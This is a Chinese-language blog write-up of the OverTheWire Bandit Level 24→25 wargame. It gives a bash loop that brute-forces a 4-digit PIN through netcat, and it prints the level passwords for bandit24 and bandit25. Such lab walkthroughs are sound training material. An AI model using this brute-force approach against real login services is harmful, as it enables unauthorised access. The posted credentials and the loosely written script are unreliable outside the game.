[OverTheWire] Bandit Level 24 → Level 25

Cavey (凱維)

公告

歡迎

Learn More

標籤

Cavey (凱維)

站點統計

文章

42

分類

2

標籤

28

總字數

9,539

運行天數

0 天

最後活動

0 天前

Cavey (凱維)

站點統計

文章

42

分類

2

標籤

28

總字數

9,539

運行天數

0 天

最後活動

0 天前

142 字

1 分鐘

[OverTheWire] Bandit Level 24 → Level 25

2025-01-24

資安筆記

OTW

/

Bandit

Level Goal#

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing. You do not need to create new connections each time

My Answer (Step by step)#

連線到伺服器並登入

1
ssh bandit24@bandit.labs.overthewire.org -p 2220

透過 mktemp 指令產生暫存資料夾，並透過 cd 指令進入它

1
mktemp -d
2
cd /tmp/tmp.xs599rbycC

透過 vim, vi, nano 等指令產生稍後要執行的腳本檔，並透過 chmod 指令修改權限以便執行

1
nano a.sh

a.sh

1
#!/bin/bash
2
PWD='gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8'
3
for n in `seq 1 9999`;
4
do
5
    echo "$PWD $n"
6
done | nc localhost 30002

1
chmod 777 -R /tmp/tmp.xs599rbycC

執行它，即可獲得 Level 25 密碼!

1
./a.sh
2
# Wrong! Please enter the correct current password and pincode. Try again.
3
# Wrong! Please enter the correct current password and pincode. Try again.
4
# Wrong! Please enter the correct current password and pincode. Try again.
5
# Wrong! Please enter the correct current password and pincode. Try again.
6
# Wrong! Please enter the correct current password and pincode. Try again.
7
# Correct!
8
# The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4